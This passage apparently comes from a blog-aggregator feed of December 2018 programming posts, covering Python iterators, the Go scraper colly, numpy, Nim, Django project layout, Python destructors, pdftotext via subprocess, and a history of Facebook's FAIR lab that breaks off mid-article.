list1 = ['哈哈', '西西', '嘻嘻'] for index, value in enumerate(list1): print(index, value) 复制代码

3、元祖和字符串的迭代与列表的类似,一样的可以使用 enumerate 进行下标迭代

4、字典的迭代方式一

dict1 = {'name': '张三', 'age': 20, 'gender': '男'} for item in dict1: print(item) 复制代码

5、字典的迭代方式二

dict1 = {'name': '张三', 'age': 20, 'gender': '男'} for key in dict1.keys(): print(key) 复制代码

6、字典的迭代方式三

dict1 = {'name': '张三', 'age': 20, 'gender': '男'} for value in dict1.values(): print(value) 复制代码

7、字典的迭代方式四

dict1 = {'name': '张三', 'age': 20, 'gender': '男'} for k, v in dict1.items(): print(k, v) 复制代码二、可迭代与迭代器的区别

1、可迭代一般都可以使用 for 来遍历

2、迭代器不仅仅可以使用 for 遍历还可以使用 next() 函数一次获取一个元素

3、可迭代转换迭代对象使用 iter(可迭代对象)

4、判断可迭代对象与迭代器的方式

from collections.abc import Iterator, Iterable # Iterable 表示可迭代对象 # Iterator 表示迭代器 list1 = [1, 2, 3] print(isinstance(list1, Iterator)) print(isinstance(list1, Iterable)) print(isinstance(iter(list1), Iterator)) 复制代码

5、集合数据类型如 list 、 dict 、 str 等是 Iterable 但不是 Iterator ，不过可以通过 iter() 函数获得一个 Iterator 对象

三、自己实现一个可迭代的对象

1、方式一(在类中实现 __getitem__ 魔法函数)

from collections.abc import Iterator, Iterable class Company(object): def __init__(self, employee_list): self.employee = employee_list def __getitem__(self, item): return self.employee[item] if __name__ == "__main__": company = Company(['张三', '李四', '王五']) print(isinstance(company, Iterable)) print(isinstance(company, Iterator)) print(isinstance(iter(company), Iterator)) for item in company: print(item) 复制代码

2、方式二(在类中实现 __iter__ 魔法函数,需要结合 __next__ 魔法函数) 其实已经是迭代器

from collections.abc import Iterator, Iterable class Company(object): def __init__(self, employee_list): self.employee = employee_list self.index = 0 def __iter__(self): return self def __next__(self): try: current_val = self.employee[self.index] except IndexError: raise StopIteration self.index += 1 return current_val if __name__ == "__main__": company = Company(['张三', '李四', '王五']) print(isinstance(company, Iterable)) print(isinstance(company, Iterator)) for item in company: print(item) 复制代码

3、总结

1. iter 内置函数会调用 __iter__ 魔法函数,如果没有 __iter__ 魔法函数就会去调用 __getitem__ 魔法函数通过 isinstance(company, Iterable) 判断对象是否可迭代通过 isinstance(company, Iterator) 判断对象是否为迭代器可迭代器对象不代表是迭代器,但是可以通过 iter() 函数将可迭代的转换为迭代器

↧

写爬虫还在用 python？快来试试 go 语言的爬虫框架吧

December 7, 2018, 12:32 pm

≫ Next: Unique random matrix in numpy

≪ Previous: 关于python中可迭代对象和迭代器的一些理解

今天为大家介绍的是一款 go 语言爬虫框架 -- colly 。

开始

首先，你可以使用一下命令安装 colly 。

go get -u github.com/gocolly/colly/...

其次，构建 Collector ，添加事件，然后访问：

package main import ( "fmt" "github.com/gocolly/colly" ) func main() { // 初始化 colly c := colly.NewCollector( // 只采集规定的域名下的内容 colly.AllowedDomains("hackerspaces.org", "wiki.hackerspaces.org"), ) // 任何具有 href 属性的标签都会触发回调函数 // 第一个参数其实就是 jquery 风格的选择器 c.OnHTML("a[href]", func(e *colly.HTMLElement) { link := e.Attr("href") fmt.Printf("Link found: %q -> %s\n", e.Text, link) // 访问该网站 c.Visit(e.Request.AbsoluteURL(link)) }) // 在请求发起之前输出 url c.OnRequest(func(r *colly.Request) { fmt.Println("Visiting", r.URL.String()) }) // 从以下地址开始抓起 c.Visit("https://hackerspaces.org/") }

运行以上代码，会从最开始的地址抓起，一直把规定的两个域名下的页面递归采集完。看，是不是很简单很方便！

登录鉴权

某些网站的某些页面可能需要登录状态才能访问。 Colly 提供 Post 方法用于登录请求（ colly 本身会维护 cookie ）。

// authenticate err := c.Post("http://example.com/login", map[string]string{"username": "admin", "password": "admin"}) if err != nil { log.Fatal(err) }

很多网站可能会有验证码、 csrf_token 之类的仿网络攻击策略。对于 csrf_token ，一般都会在页面的某个位置，比如表单，或者 mate 标签里，这些都是很容易获取到的。对于验证码，可以尝试在控制台输入结果或者采用图片识别的方式。

速率控制

很多内容网站会有防采集策略，所以过快的请求速率很可能导致被封 ip 。这里可以使用 LimitRule 限制采集速度。

// 对于任何域名，同时只有两个并发请求在请求该域名 c.Limit(&colly.LimitRule{DomainGlob: "*", Parallelism: 2})

上面是一个简单的例子。除了可以限制域名并发量外，还可以限制间隔时间等。我们看一下 LimitRule 的结构：

type LimitRule struct { // 匹配域名的正则表达式 DomainRegexp string // glob 匹配模式 DomainGlob string // 在发起一个新请求时的等待时间 Delay time.Duration // 在发起一个新请求时的随机等待时间 RandomDelay time.Duration // 匹配到的域名的并发请求数 Parallelism int waitChan chan bool compiledRegexp *regexp.Regexp compiledGlob glob.Glob } 队列与 redis 存储支持

某些情况下，我们的爬虫可能会主动或被动地挂掉，所以一个合理的进度保存有助于我们排除已经爬过的内容。这时候我们就需要用到队列以及存储支持。

Colly 本身有文件存储模式，默认是未开启状态。推荐使用 redis 进行存储。

urls := []string{ "http://httpbin.org/", "http://httpbin.org/ip", "http://httpbin.org/cookies/set?a=b&c=d", "http://httpbin.org/cookies", } c := colly.NewCollector() // 创建 redis storage storage := &redisstorage.Storage{ Address: "127.0.0.1:6379", Password: "", DB: 0, Prefix: "httpbin_test", } // 把 storage 设置到 collector 上 err := c.SetStorage(storage) if err != nil { panic(err) } // 删除之前的数据（如果需要） if err := storage.Clear(); err != nil { log.Fatal(err) } // 结束后关闭 redis 连接 defer storage.Client.Close() // 使用 redis 作为存储后端，创建请求队列 // 消费者数量设定为 2 q, _ := queue.New(2, storage) c.OnResponse(func(r *colly.Response) { log.Println("Cookies:", c.Cookies(r.Request.URL.String())) }) // 把 url 加入到队列 for _, u := range urls { q.AddURL(u) } // 开始采集 q.Run(c)

使用队列时，在解析到页面的链接后，可以继续把链接的 url 添加到队列中。

内容解析

内容抓取到了，如何解析并获取我们想要的内容呢？

以 html 为例（ colly 也有 xml 等内容解析）：

// refentry 内容 c.OnHTML(".refentry", func(element *colly.HTMLElement) { // ... }) OnHtml 第一个参数是 jquery风格的选择器，第二个参数是 callback，callback 会传入 HTMLElement 对象。HTMLElement 结构体： type HTMLElement struct { // 标签的名称 Name string Text string attributes []html.Attribute // 当前的 request Request *Request // 当前的 response Response *Response // 当前节点的 DOM 元素 DOM *goquery.Selection // 在该 callback 回调中，此 element 的索引 Index int }

其中，可以通过 DOM 字段操作（增删节点）、遍历、获取节点内容。

DOM 字段是 Selection 类型，该类型提供了大量的方法。如果你用过 jQuery ，你一定会觉得熟悉。

举个栗子，我们想要删除 h1.refname 标签，并返回父元素的 html 内容：

c.OnHTML(".refentry", func(element *colly.HTMLElement) { titleDom := element.DOM.Find("h1.refname") title := titleDom.Text() titleDom.Remove() content, _ := element.DOM.Html() // ... }) 其他

除此之外， Colly 还具有其他强大的功能，比如最大递归深度、 url 过滤、 url revisit （默认一个 url 只访问一次）以及编码检测等。这些都可以在官网文档或者 colly 代码里找到影子。

另附上 colly 文档地址： http://go-colly.org/docs/intr...

↧

Unique random matrix in numpy

December 7, 2018, 3:10 pm

≫ Next: Nim: The good, the OK, and the hard

≪ Previous: 写爬虫还在用 python？快来试试 go 语言的爬虫框架吧

I want to make a matrix x with shape (n_samples, n_classes) where each x[i] is a random one-hot vector. Here's a slow implementation: x = np.zeros((n_samples, n_classes)) J = np.random.choice(n_classes, n_samples) for i, j in enumerate(J): x[i, j] = 1

What's a more pythonic way to do this?

Create an identity matrix using np.eye :

x = np.eye(n_classes)

Then use np.random.choice to select rows at random:

x[np.random.choice(x.shape[0], size=n_samples)]

As a shorthand, just use:

np.eye(n_classes)[np.random.choice(n_classes, n_samples)]

Demo:

In [90]: np.eye(5)[np.random.choice(5, 100)] Out[90]: array([[ 1., 0., 0., 0., 0.], [ 1., 0., 0., 0., 0.], [ 0., 0., 1., 0., 0.], [ 0., 0., 0., 0., 1.], [ 0., 0., 0., 1., 0.], [ 1., 0., 0., 0., 0.], [ 0., 0., 0., 1., 0.], .... (... to 100)

↧

Nim: The good, the OK, and the hard

December 7, 2018, 4:40 pm

≫ Next: Django project, apps structure and folders

≪ Previous: Unique random matrix in numpy

Background

I’m a software engineer at ThreeFoldTech and the author ofNim Days

One of the projects we develop at ThreeFoldTech is Zero-OS a stateless linux operating system designed for clustered deployments to host virtual machines and containerized applications. We wanted to have a CLI (like docker) to manage the containers and communicate with zero-os instead of using python client.

Application requirements single binary zos should be like docker for dockerd commands to interact with zero-os (via redis) subcommands to interact with containers on zero-os documentation (soft documentation, hard documentation) tabular output for humans (listing containers and such) support json output when needed too (for further manipulation by tools like jq)

Sounds simple enough. Any language would do just fine

Choosing Nim

From Nim website

Nim is a systems and applications programming language. Statically typed and compiled, it provides unparalleled performance in an elegant package.

High-performance garbage-collected language Compiles to C, C++ or javascript Produces dependency-free binaries Runs on windows, macOS, Linux, and more

In the upcoming sections, I’ll talk about the good, the okay, and the hard points I faced while developing this simple CLI application with the requirements above.

The good Static typing

Nim eliminates a whole class of errors by being statically typed

Expressiveness

Nim is like python but (whitespace sensitive language) and there’s even a guide on the official repo Nim for Python programmers . Seeing some of Pascal concepts in Nim gets me very nostalgic too.

import strutils, strformat, os, ospaths, osproc, tables, parsecfg, json, marshal, logging import net, asyncdispatch, asyncnet, streams, threadpool, uri import logging import algorithm import base64 import redisclient, redisparser import asciitables import docopt proc checkContainerExists*(this:App, containerid:int): bool= ## checks if container `containerid` exists or not try: discard this.containerInfo(containerid) result = true except: result = false

I find UFCS (Uniform Function Call Syntax) really great tooexcellent nim basics

proc plus(x, y: int): int = # <1> return x + y proc multi(x, y: int): int = return x * y let a = 2 b = 3 c = 4 echo a.plus(b) == plus(a, b) echo c.multi(a) == multi(c, a) echo a.plus(b).multi(c) # <2> echo c.multi(b).plus(a) # <3>

Also case insensitivity toUpper toupper to_upper is pretty neat

I don’t use the same identifier with different cases in the same scope

type ContainerInfo* = object of RootObj id*: string cpu*: float root*: string hostname*: string name*: string storage*: string pid*: int ports*: string

I like the way of defining types, enums and access control * means public.

Developing sync, async in the same interface Pragmas are Nim’s method to give the compiler additional information/commands without introducing a massive number of new keywords. Pragmas are processed on the fly during semantic checking. Pragmas are enclosed in the special {. and .} curly brackets. Pragmas are also often used as a first implementation to play with a language feature before a nicer syntax to access the feature becomes available.

I’m a fan of multisync pragma because it allows you to define procs for async, sync code easily

proc readMany(this:Redis|AsyncRedis, count:int=1): Future[string] {.multisync.} = if count == 0: return "" let data = await this.receiveManaged(count) return data

Basically in sync execution multisync with remove Future, and await from the code definition and will leave them in case of async execution

The tooling vscode-nim

vscode-nim is my daily driver, works as expected, but sometimes it consumes so much memory. there’s also LSP in the works

nimble

Everything you expect from the package manager, creating projects, managing dependencies and publishing (too coupled with github, but that’s fine with me)

the OK

These are the OK parts that can be improved in my opinion

Documentation

There’s a great community effort to provide documentation . I hope we get more and more soft documentation and better quality on the official docs too.

Weird symbols / json

Nim chooses unreadable symbols %* and $$ as over clear names like dumps or loads.

Error Messages

Sometimes the error messages aren’t good enough. For instance, I got i is not accessible and even with using writeStackTrace I couldn’t get anything useful. So I grepped the codebase where accessible comes from and continued from there.

Another example was this

timeddoutable.nim(44, 16) template/generic instantiation from here timeddoutable.nim(34, 6) Error: type mismatch: got <Thread[ptr Channel[system.bool]], proc (cancelChan: ptr Channel[system.bool]):bool{.gcsafe, locks: 0.}, ptr Channel[system.bool]> but expected one of: proc createThread[TArg](t: var Thread[TArg]; tp: proc (arg: TArg) {.thread, nimcall.}; param: TArg) first type mismatch at position: 2 required type: proc (arg: TArg){.gcsafe.} but expression 'p' is of type: proc (cancelChan: ptr Channel[system.bool]): bool{.gcsafe, locks: 0.} proc createThread(t: var Thread[void]; tp: proc () {.thread, nimcall.}) first type mismatch at position: 1 required type: var Thread[system.void] but expression 't' is of type: Thread[ptr Channel[system.bool]] expression: createThread(t, p, addr(cancelChan))

While the error is clear I just had a hard time reading it

The Hard

I really considered switching to language with a more mature ecosystem for these points (multiple times)

Static linking

Nim promises Produces dependency-free binaries as stated on its website, but getting a static linked binary is hard, and undocumented process while it was one of the cases I hoped to use Nim for.

I managed to statically link with PCRE and SSL with lots of help from the community .

Dynamic linking Building on Mac OSX with SSL is no fun, specially when your SSL isn’t 1.1 [I managed to do with lots of help from the community]

brew install openssl@1.1 nim c -d:ssl --dynlibOverride:ssl --dynlibOverride:crypto --threads:on --passC:'-I/usr/local/opt/openssl\@1.1/include/' --passL:'-lssl -lcrypto -lpcre' --passL:'-L/usr/local/opt/openssl\@1.1/lib/' src/zos.nim

Developing a redisclient

We have a redis protocol keyvalue store 0-db that I needed to work against a while ago, and I found a major problem with the implementation of the parser and the client in the official nim redis library. So I had to roll my own parser / client

Developing asciitable library

To show a table listing all of the containers (id, name, open ports and image it’s running from) I needed an ascii table library in Nim (I found 0 libraries). I had to write my own nim-asciitables

Nim-JWT

In the transport layer, we send a JWT token to request extra privileges on zero-os and for that, I needed jwt support. Again, jwt libraries are far from complete in Nim and had to try to fix it ES384 support with that fix I was able to get the claims, but I couldn’t really verify it with the public key :( So I decided not to do client side validation and leave the validation to zero-os (the backend)

Concurrency and communication

In some parts of the application we want to add the ability to timeout after some period of time, and Nim supports multithreading using threadpool and async/await combo and has HTTPBeast , So that shouldn’t be a problem.

When I saw Channels and spawn I thought it’d be as easy as goroutines in Go or fibers in Crystal

So that was my first try with spawn

import os, threadpool var cancelChan: Channel[bool] cancelChan.open() proc p1():bool= result = true for i in countup(0,50): echo "p1 Doing action" sleep(1000) let (hasData, msg) = cancelChan.tryRecv() if msg == true: echo "Cancelling p1" return echo "Done p1..." proc p2(): bool = result = true for i in countup(0,5): echo "p2 Doing action" sleep(1000) let (hasData, msg) = cancelChan.tryRecv() if msg == true: echo "Cancelling p1" return echo "Done p2" proc timeoutable(p:proc, timeout=10)= var t = (spawn p()) for i in countup(0, timeout): if t.isReady(): return sleep(1000) cancelChan.send(true) when isMainModule: timeoutable(p1) timeoutable(p2)

However, The Nim creator Andreas Rumpf said using Spawn/Channels is a bad idea and channels are meant to be used with Threads, So I tried to move it to threads

import os, threadpool type Args = tuple[cancelChan:ptr Channel[bool], respChan: ptr Channel[bool]] proc p1(a: Args): void {.thread.}= var cancelChan = a.cancelChan[] var respChan = a.respChan[] for i in countup(0,50): let (hasData, msg) = cancelChan.tryRecv() echo "p1 HASDATA: " & $hasData echo "p1 MSG: " & $msg if hasData == true: echo "Cancelling p1" respChan.send(false) return echo "p1 Doing action" sleep(1000) echo "Done p1..." respChan.send(true) proc p2(a: Args): void {.thread.}= var cancelChan = a.cancelChan[] var respChan = a.respChan[] for i in countup(0,5): let (hasData, msg) = cancelChan.tryRecv() echo "p2 HASDATA: " & $hasData echo "p2 MSG: " & $msg if hasData: echo "proc cancelled successfully" respChan.send(false) return echo "p2 Doing action" sleep(1000) echo "Done p2..." respChan.send(true) proc timeoutable(p:proc, timeout=10): bool= var cancelChan: Channel[bool] var respChan: Channel[bool] var t: Thread[Args] cancelChan.open() respChan.open() var args = (cancelChan.addr, respChan.addr) createThread[Args](t, p, (args)) for i in countup(0, timeout): let (hasData, msg) = respChan.tryRecv() if hasData: return msg sleep(1000) echo "Cancelling proc.." cancelChan.send(true) close(cancelChan) close(respChan) return false when isMainModule: echo "P1: " & $timeoutable(p1) echo "P2: " & $timeoutable(p2)

I’m not a fan of this passing pointers , casting , .addr

Macros

Macros allow you to apply transformations on AST on compile time which is really amazing, but It can be very challenging to follow or even work with specially if it’s not well documented and I feel they’re kinda abused in the language resulting in half-baked libraries and macros playground.

Conclusion

Overall, Nim is a language with a great potential, and its small team is doing an excellent job. Just be prepared to write lots of missing libraries if you want to use it in production. It’s a great chance to reinvent the wheel with no one blaming you :)

↧

Django project, apps structure and folders

December 7, 2018, 7:50 pm

≫ Next: [译]在Python中安全使用析构函数

≪ Previous: Nim: The good, the OK, and the hard

In this blog post I’ll talk about Django folders structure inside a project.

After developing a few projects with Django 1.11 and Django 2.0, I’ve stumbled with somewhat an issue that’s been bothering me. When you create projects and apps in Django, as the tutorial shows you, apps will be created inside the main project folder, at the same level of the project’s settings folder (usually it’s the folder that has the same name as your project).

So basically, what you end up with is a container folder and inside has the project config folder, and many other folders with the app names.

So as a result, you get different ordering in the folders for every new project, as folders will usually order by name inside your IDE, i.e PyCharm.

So, for instance, if your app is called ‘apples’ and your project is called ‘mysite’, then the order will be:

- apples
- mysite

Let’s also assume you’re using docker, so you probably have a docker folder, now we have:

- apples
- docker
- mysite

But if you create an app called ‘oranges’, now your project folder is:

- apples
- docker
- mysite
- oranges

This is unconfortable because you never know which is the project’s config folder and which ones are the different app folders, so you keep opening the wrong folders all the time!! This is awful, as programers, we tend strive for efficiency!!

So my strategy for now is to bundle all apps inside an apps folder, so my project will always look like:

- apps
- docker
- mysite

And there you have it, nicely ordered apps inside your project!!

To include them in your settings, you just have to remember to include the namespace

'apps.your_app_name'

, so if your app is called apples

INSTALLED_APPS += ['apps.apples']

Also, when importing classes in different files, just use the namespace. So imagine, I need to import the Apple class defined in my models inside my apples app, would do something like so:

from apps.apples.models import Apple

If you’ve read until here, it means you REALLY CARE about your project folder structure, so here’s a handy script I’ve created to start apps. It’s just a wrapper from the django startapp command, but it takes care of the apps folder, etc.

#!/usr/bin/env bash
if [ "$1" == "-h" ]; then
echo "This script will create an app inside the apps folder"
echo "To use type the following line:"
echo "bash start-app.sh app_name"
echo "Replace app_name with the actual name for your app"
elif [ "$1" != "" ]; then
if [ ! -d "apps" ]; then
mkdir apps
touch apps/__init__.py
fi
mkdir apps/$1
if [ -f /.dockerenv ]; then
python manage.py startapp $1 apps/$1
else
docker-compose run django python manage.py startapp $1 apps/$1
fi
echo "Success! The app $1 has been aded, don't forget to add INSTALLED_APPS += ['apps.$1'] in your project's settings.py"
else
echo "Error! One parameter is expected: app_name"
fi

I call the file “start-app.sh”, so to use it just type

bash start-app.sh

Happy coding!!

Also published on Medium .

↧

[译]在Python中安全使用析构函数

December 7, 2018, 7:48 pm

≫ Next: Using subprocess&period;popen in python with the os&period;tmp file ...

≪ Previous: Django project, apps structure and folders

作者: Eli Bendersky

本文适用于 python 2.5 与 2.6―― 如果你看到 Python 3 有任何不同，请让我知道。

在 C++ 中，析构函数是一个非常重要的概念，它们是 RAII （ resource acquisition is initialization ）的一个基本成分――在抛出异常的程序中，基本上是编写涉及资源分配与释放代码仅有的安全方式。

在 Python 中，析构函数的需求少得多，因为 Python 有进行内存管理的垃圾收集器。不过，虽然内存是最常见的分配资源，它不是唯一的。还有要关闭的套接字与数据库连接，要刷新的文件、缓冲与缓存，以及在一个对象用完时需要释放的另外几种资源。

因此 Python 有析构函数的概念―― __del__ 方法。出于某个原因， Python 社区里的许多人认为 __del__ 是邪恶的，不应该使用。不过，简单 grep 标准库显示，在我们使用且喜欢的类中使用了数以十计的 __del__ ，那么要点在哪里？在本文中，我将尝试澄清它（首先是为我自己），何时应该使用 __del__ ，以及如何使用。

简单的例子代码

首先一个基本例子：

class FooType ( object ):

def __init__ ( self , id ):

self .id = id

print self .id, 'born'

def __del__ ( self ):

print self .id, 'died'

ft = FooType( 1 )

这打印出：

1 born

1 died

现在，回忆由于一个引用计数垃圾收集器的使用， Python 在一个对象退出作用域时，不会清理它。在该对象的最后一个引用退出作用域时，才将清理它。下面是一个展示：

class FooType ( object ):

def __init__ ( self , id ):

self .id = id

print self .id, 'born'

def __del__ ( self ):

print self .id, 'died'

def make_foo ():

print 'Making...'

ft = FooType( 1 )

print 'Returning...'

return ft

print 'Calling...'

ft = make_foo()

print 'End...'

这打印出：

Calling...

Making...

1 born

Returning...

End...

1 died

在程序终止时调用了这个析构函数，不是在 ft 退出 make_foo 里的作用域时。

析构函数的替代品

在我继续之前，一个合适的揭露：对资源的管理， Python 提供了比析构函数更好的方法――上下文（ context ）。我不会把这变成上下文的一个教程，但你应该熟悉 with 语句，以及可以在内部使用的对象。例如，处理文件写入的最好方法是：

with open ( 'out.txt' , 'w' ) as of:

of.write( '222' )

这确保在退出 with 内部的代码块时，该文件被正确关闭，即使抛出异常。注意这展示了一个标准的上下文管理器。另一个是 threading.lock ，它返回一个非常适合在一个 with 语句中使用的上下文管理器。更多细节，阅读 PEP 343 。

虽然推荐， with 不总是适用的。例如，假设你有一个封装了某种数据库的对象，在该对象生命期结束时，必须提交并关闭该数据库。现在，假定该对象应该是某种大且复杂的类（比如一个 GUI 会话，或者一个 MVC 模型类）的一个成员变量。父亲在别的方法中不时地与该 DB 对象交互，因此使用 with 是不现实的。所需要的是一个起作用的析构函数。

析构函数何处走偏

为了解决我在上一段展示的用例，你可以采用 __del__ 析构函数。不过，知道这不总是工作良好是重要的。引用计数垃圾收集器的死对头是循环引用。下面是一个例子：

class FooType ( object ):

def __init__ ( self , id , parent):

self .id = id

self .parent = parent

print 'Foo' , self .id, 'born'

def __del__ ( self ):

print 'Foo' , self .id, 'died'

class BarType ( object ):

def __init__ ( self , id ):

self .id = id

self .foo = FooType( id , self )

print 'Bar' , self .id, 'born'

def __del__ ( self ):

print 'Bar' , self .id, 'died'

b = BarType( 12 )

输出：

Foo 12 born

Bar 12 born

噢……发生了什么？析构函数在哪里？下面是 Python 文档在这件事上的陈述：

在启用了可选的循环检测器（默认打开）时，检测垃圾的循环引用，但仅在不涉及 Python 层面的 __del__() 方法时，才能被清理。

Python 不知道销毁彼此持有循环引用的对象的安全次序，因此作为一个设计决策，它只是不对这样的方法调用析构函数！

那么，现在怎么办？

因为其缺陷，我们不应该使用析构函数吗？我非常吃惊地看到许多 Python 支持者认为这样，并建议使用显式的 close 方法。但我不同意――显式的 close 方法不那么安全，因为它们容易忘记调用。另外，在发生异常时（在 Python 里，它们随时出现），管理显式关闭变得非常困难且烦人。

我确实认为析构函数可以且应该在 Python 里被安全地使用。带着几分小心，这绝对可能。

首先以及最重要的，注意到合理的循环引用是罕见的。我故意说合理的（ justified ）――出现循环引用的大量使用是坏的设计以及有漏洞抽象的样本。

作为一个经验规则，资源尽可能由最底层的对象持有。不要在你的 GUI 会话里直接持有一个 DB 资源。使用一个对象封装这个 DB 连接，并在析构函数里安全地关闭它。 DB 对象没有理由持有你代码里其他对象的引用。如果这样――它违反了几个好的设计实践。

有时，在复杂代码中，依赖性注入（ dependency injection ）有助于防止循环引用，不过即使在你发现需要一个真循环引用的罕见情形里，也存在解决方案。 Python 为此提供了 weakref 模块。文档很快揭示，这正是我们这里所需要的：

一个对象的弱引用不足以保持对象存活：当一个被引用对象仅有的引用是弱引用时，垃圾收集可以自由地销毁这个被引用对象，并为其他对象重用其内存。弱引用的主要使用是实现缓存或持有大对象的映射，其中期望大对象不仅仅因为出现在缓存或映射中，而被保持存活。

下面是用 weakref 重写的前面的例子：

import weakref

class FooType ( object ):

def __init__ ( self , id , parent):

self .id = id

self .parent = weakref.ref(parent)

print 'Foo' , self .id, 'born'

def __del__ ( self ):

print 'Foo' , self .id, 'died'

class BarType ( object ):

def __init__ ( self , id ):

self .id = id

self .foo = FooType( id , self )

print 'Bar' , self .id, 'born'

def __del__ ( self ):

print 'Bar' , self .id, 'died'

b = BarType( 12 )

现在我们得到希望的结果：

Foo 12 born

Bar 12 born

Bar 12 died

Foo 12 died

这个例子里的小改动是，在 FooType 构造函数里，我使用 weakref.ref 对 parent 引用赋值。这是一个弱引用，因此它不会真正创建一个环。因此 GC 看不到环，它销毁了这两个对象。

结论

Python 有经由 __del__ 方法的完美、可用的对象析构函数。对绝大多数用例，它工作良好，但堵塞在循环引用处。不过，循环引用通常是坏设计的一个迹象，它们很少是合理的。对极少数使用了合理的循环引用的用例里，使用弱引用很容易打破循环， Python 在 weakref 模块里提供弱引用。

参考文献

在准备本文时，某些有用的链接：

Python destructor and garbage collection notes RAII The Python documentation This and also this Stack Overflow discussions.

↧

Using subprocess&period;popen in python with the os&period;tmp file ...

December 7, 2018, 7:46 pm

≫ Next: FAIR 这五年！

≪ Previous: [译]在Python中安全使用析构函数

I am writing a python program in linux and in part of it running the pdftotext executable to convert a pdf text. The code I am currently using is given below.

pdfData = currentPDF.read() tf = os.tmpfile() tf.write(pdfData) tf.seek(0) out, err = subprocess.Popen(["pdftotext", "-", "-"], stdin = tf, stdout=subprocess.PIPE ).communicate()

This works fine, but now I want to run the pdftotext executable with the -layout option (preserves layout of document). I tried replacing the "-" with layout, replacing "pdftotext" with "pdftotext -layout" etc. None of it works. They all give me an empty text. Since the input is being piped in via the temp file, I am having trouble figureing out the argument list. Most of the documentation on Popen assumes all the parameters are being passed in through the argument list, but in my case the input is being passed in through the temp file.

Any help would be greatly appreciated.

This works for me:

out, err = subprocess.Popen( ["pdftotext", '-layout', "-", "-"], stdin = tf, stdout=subprocess.PIPE ).communicate()

Although I couldn't find explicit confirmation in the man page, I believe the first - tells pdftotext to expect PDF-file to come from stdin, and the second - tells pdftotext to expect text-file to be sent to stdout.

↧

FAIR 这五年！

December 7, 2018, 10:16 pm

≫ Next: 将深度学习模型部署为web应用有多难？答案自己找

≪ Previous: Using subprocess&period;popen in python with the os&period;tmp file ...

2013 年，Facebook 在 NeurIPS 大会上宣布成立 FAIR。五年过去了，FAIR 经历了什么？做出了哪些成绩？给世界带来了什么影响？FAIR 创建者 Yan LeCun 、FAIR 现任领导者 Jerome Pesenti、Facebook CTO Mike Schroepfer 带大家回忆 FAIR 这五年。

五年前，我们创立了 Facebook 人工智能研究院（FAIR），旨在通过开放研究推进人工智能的发展，并惠及所有人。FAIR 的目标是理解智能的本质，以创造真正的智能机器。自此以后，FAIR 不断发展，并成长为一个国际研究组织，在门洛帕克、纽约、巴黎、蒙特利尔、特拉维夫、西雅图、匹兹堡、伦敦都设有实验室。人工智能已经成为 Facebook 的核心，因此 FAIR 现在是更大的 Facebook AI 组织的组成部分，该组织致力于人工智能研发的各个方面，从基础研究到应用研究和技术开发。

FAIR 在我们工作的各个方面都应用了开放模式，与社区展开广泛合作。我们团队经常早早地发布前沿研究成果，并尽可能地开源研究代码、数据集和工具（如 PyTorch、fastText、FAISS、 Detectron ）。这种方法也成功地推动了人工智能的研究发展。今年，FAIR 的研究人员已经获得了广泛认可，在 ACL、EMNLP、CVPR、ECCV 等大会获得了最佳论文奖，在 ECCV、ICML 和 NeurIPS 会议上获得了时间检验奖（Test of Time award）。开放的工作可以让每个人在人工智能领域取得更快的进步。

赋予机器真正的智能既是一个科学挑战，也是一项技术和产品工程的难题。FAIR 研究的很大一部分集中在推理、预测、规划和无监督学习的关键这些基本问题上。反过来，探索这些领域需要对生成模型、因果关系、高维随机优化和博弈论等具备更好的理论理解。释放人工智能未来的全部潜力需要这些长期的研究探索。我们从过去五年解决的项目中挑选了一些，来展示 FAIR 是如何完成其使命、为这个领域做出贡献并对世界产生影响的。

这个时间表突出了过去五年中 FAIR 完成的许多项目。

记忆网络

2014 年，FAIR 的研究人员发现了神经网络的一个内在局限――长期记忆。尽管神经网络可以在数据集训练过程中学习，但是一旦这些系统开始运行，它们通常就没办法存储新的信息来帮助解决后面的特定任务。所以我们开发了一种新的支持学习模型的机器，这些机器记忆了足够多的互动信息，可以回答一般的知识问题并在对话中参考之前的陈述。在 2014 年关于该方法的早期论文《Memory Networks》中，我们测试了这一点：让一个支持记忆的网络根据提供给它的《指环王》系列简短总结来回答关于《指环王》情节的问题。该网络能够学习简单的语言模式，泛化到未知单词的含义并正确回答问题。

在接下来的两年里，FAIR 继续发展这种方法，扩大了研究范围并探索相关领域。该团队用 push-pop 堆栈增强 RNN，即 StackRNN，它能够以无监督方式从序列中训练。该团队建立了 bAbl 问答任务数据集，以帮助测试文本理解任务的性能。bAbI 现在是开源项目 ParlAI 的一部分，该项目包含数千个对话样本，范围从餐馆预订请求的回应到关于电影演员的回答。我们还迭代了记忆网络的架构，使其对现实应用越来越有用。这些更新包括端到端记忆网络（允许网络以较少的监督工作）和 key-value 记忆网络（可以通过对完全无监督的来源（如维基百科条目）进行归纳进行训练）。

自监督学习和生成模型

长期以来，通过自监督学习（SSL）利用大量无标注数据来扩展人工智能一直是 FAIR 的优先事项。使用 SSL，机器可以通过输入的未标注图像、视频或音频来学习世界的抽象表征。SSL 的一个应用例子是向机器展示视频片段，然后训练它来预测后面的帧。通过学习预测，机器可以捕捉关于世界如何运作的知识，并学习对世界的抽象表征。使用 SSL，机器通过观察来学习，一点一点，就像婴儿和动物幼崽一样，慢慢积累大量关于世界的背景知识。我们希望这样能形成一种常识。获取预测世界模型也是构建人工智能系统的关键，该系统能够推理、预测其行为的后果并在现实世界中采取行动。

2014 年，我们来自蒙特利尔大学学习算法研究所（MILA）的朋友 Ian Goodfellow 等人提出了一种新的无监督学习方法――生成对抗网络（GAN）。我们一下被自监督学习方法的潜在应用迷住了。但是，尽管 GAN 看起来很有前景，当时却只在一些简单的问题上证明了效果。自 2015 年开始，我们陆续发表一系列论文来让研究社区相信 GAN 确实有效。GAN 被用来训练机器在不确定的情况下通过两个神经网络互相对抗来做出预测。在典型的 GAN 架构中，生成器网络从一堆随机数中生成数据，例如图像或视频帧（可能还包括过去的视频帧）。同时，判别器网络需要区分真实数据（真实图像和视频帧）和生成器生成的「伪」输出。这场持续的比赛既优化了两个网络，也带来了越来越好的预测结果。

我们的每篇论文都关注 GAN 的不同变体，包括深度卷积生成对抗网络（DCGAN）和拉普拉斯对抗网络（LAPGAN）中的图像生成，以及对抗梯度差损失预测器（AGDL）中的视频预测。但是我们的共同贡献是展示：GAN 可以「创造」逼真的图像，如不存在的卧室、人脸或狗。

上述例子展示了由生成网络创造的一系列时装设计。

